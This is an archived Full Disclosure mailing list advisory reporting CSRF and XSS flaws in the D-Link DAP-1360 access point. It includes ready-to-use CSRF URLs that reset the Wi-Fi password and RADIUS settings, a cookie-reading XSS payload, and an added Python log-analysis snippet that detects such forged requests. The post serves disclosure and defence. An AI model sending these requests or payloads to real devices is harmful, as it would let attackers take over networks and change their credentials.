Full Disclosure mailing list archives

CSRF and XSS vulnerabilities in D-Link DAP-1360


From: "MustLive" <mustlive () websecurity com ua>
Date: Mon, 1 Dec 2014 23:56:24 +0200

Hello list!

There are Cross-Site Request Forgery and Cross-Site Scripting
vulnerabilities in D-Link DAP-1360 (Wi-Fi Access Point and Router).

These are in addition to the previous Abuse of Functionality, Brute Force,
Information Leakage, Cross-Site Request Forgery and Cross-Site Scripting
vulnerabilities in DAP-1360, which I wrote about earlier.

-------------------------
Affected products:
-------------------------

The following model is vulnerable: D-Link DAP-1360, Firmware 1.0.0. Other
firmware versions of this model must also be vulnerable.

D-Link will fix these vulnerabilities in the next firmware version, as
they answered me in October. But in November they answered me that the firmware
still had not been publicly released due to bugs and they needed to work on it.
D-Link has also delayed fixing vulnerabilities in DCS-2103 (some of them I
already disclosed recently, and there are many other holes about which I
informed them). I found this and other web cameras during the summer to watch
terrorists' activities in the Donetsk and Lugansk regions of Ukraine. Read about
my video and audio reconnaissance
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2014-November/009062.html).

I tested model DAP-1360/B/D1B. There are three models of DAP-1360:

DAP-1360/B1A (f/w ver 2.xx) - D-Link will not add fixes; it is an EOL device.
DAP-1360/B/D1B (f/w ver 1.x.x - 2.x.x) - D-Link will fix the vulnerabilities
in new firmware, which will be released in November.
DAP-1360/A/E1A (f/w ver 2.5.4 or later) - the first public firmware includes
fixes for the vulnerabilities.

----------
Details:
----------

CSRF (WASC-09):

In the Wi-Fi - Basic settings section it is possible to change the following
parameters: Hide Access Point, SSID, Country, Channel, Wireless mode, Max
Associated Clients.

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=35&res_struct_size=0&res_buf={%22HideSSID%22:false,%22mbssid%22:[{%22SSID%22:%221%22}],%22CountryCode%22:%22UA%22,%22Channel%22:%22auto%22,%22WirelessMode%22:%229%22,%22MaxStaNum%22:%220%22}

In the Wi-Fi - Security settings section it is possible to change the following
parameters: Network Authentication, Encryption Key PSK, WPA2 Pre-authentication
(when WPA2 is selected), WPA Encryption, WPA renewal. And also some parameters,
such as RADIUS_Server, RADIUS_Port and RADIUS_Key, which are not present in the GUI.

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=36&res_struct_size=0&res_buf={%22RekeyInterval%22:%223600%22,%22mbssid%22:[{%22AuthMode%22:%22WPA2PSK%22,%22WPAPSK%22:%22password%22,%22PreAuth%22:false,%22EncrypType%22:%22AES%22}],%22RADIUS_Server%22:%22192.168.0.254%22,%22RADIUS_Port%22:%221812%22,%22RADIUS_Key%22:%22dlink%22}

With this request all the above-mentioned parameters are changed, including the
Access Point password.
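As an added example, not part of the original post, here is detection logic a defender could run over the device's HTTP access log to spot settings writes of the kind shown above arriving from a foreign page. It assumes combined-log-format lines (constructed below), that res_config_action=3 is the settings-write action as in the advisory, and that the device's own UI is the only legitimate Referer; a missing Referer is also flagged.

```python
import json
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines for a DAP-1360 at 192.168.0.50 (not real captures).
SAMPLE_LOG = """\
192.168.0.23 - - [01/Dec/2014:23:10:01 +0200] "GET /index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=36&res_struct_size=0&res_buf={%22RekeyInterval%22:%223600%22,%22mbssid%22:[{%22AuthMode%22:%22WPA2PSK%22,%22WPAPSK%22:%22password%22,%22PreAuth%22:false,%22EncrypType%22:%22AES%22}],%22RADIUS_Key%22:%22dlink%22} HTTP/1.1" 200 51 "http://attacker.invalid/page.html" "Mozilla/5.0"
192.168.0.23 - - [01/Dec/2014:23:11:14 +0200] "GET /index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=35&res_struct_size=0&res_buf={%22HideSSID%22:false,%22Channel%22:%22auto%22} HTTP/1.1" 200 51 "http://192.168.0.50/index.cgi" "Mozilla/5.0"
192.168.0.23 - - [01/Dec/2014:23:12:02 +0200] "GET /index.cgi?v2=y&rq=y&res_json=y&res_config_action=1&res_config_id=36 HTTP/1.1" 200 412 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$')
CREDENTIAL_KEYS = {"WPAPSK", "RADIUS_Key", "RADIUS_Server"}  # res_buf keys named in the advisory

def all_keys(obj):
    """Collect every key in a nested JSON value (res_buf nests an mbssid list)."""
    if isinstance(obj, dict):
        return set(obj) | set().union(*(all_keys(v) for v in obj.values()))
    if isinstance(obj, list):
        return set().union(*(all_keys(v) for v in obj))
    return set()

def parse_config_write(path):
    """Return (res_config_id, keys in res_buf) for a settings write, else None."""
    parts = urlsplit(path)
    q = parse_qs(parts.query)  # also percent-decodes %22 back to quotes
    if parts.path != "/index.cgi" or q.get("res_config_action") != ["3"]:
        return None  # assumption: values other than 3 do not write settings
    try:
        buf = json.loads(q.get("res_buf", ["{}"])[0])
    except ValueError:
        buf = {}
    return q.get("res_config_id", ["?"])[0], all_keys(buf)

def find_csrf_suspects(log_text, device_origin="http://192.168.0.50/"):
    """Flag settings writes whose Referer is missing or not the device's own UI."""
    suspects = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, path, _status, referer, _ua = m.groups()
        write = parse_config_write(path)
        if write is None or referer.startswith(device_origin):
            continue
        config_id, keys = write
        suspects.append({"client": client, "config_id": config_id, "referer": referer,
                         "credentials_changed": bool(keys & CREDENTIAL_KEYS)})
    return suspects
```

Run against SAMPLE_LOG, only the first line is reported: a write to config id 36 referred from a foreign page that rewrote WPAPSK and RADIUS_Key.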

XSS (WASC-08):

Insert <script>alert(document.cookie)</script> into Quick search. This is
Strictly Social XSS.

------------
Timeline:
------------

2014.05.22 - informed developer about multiple vulnerabilities.
2014.06.28 - announced at my site about new vulnerabilities in DAP-1360.
2014.11.29 - disclosed at my site (http://websecurity.com.ua/7234/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua



_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/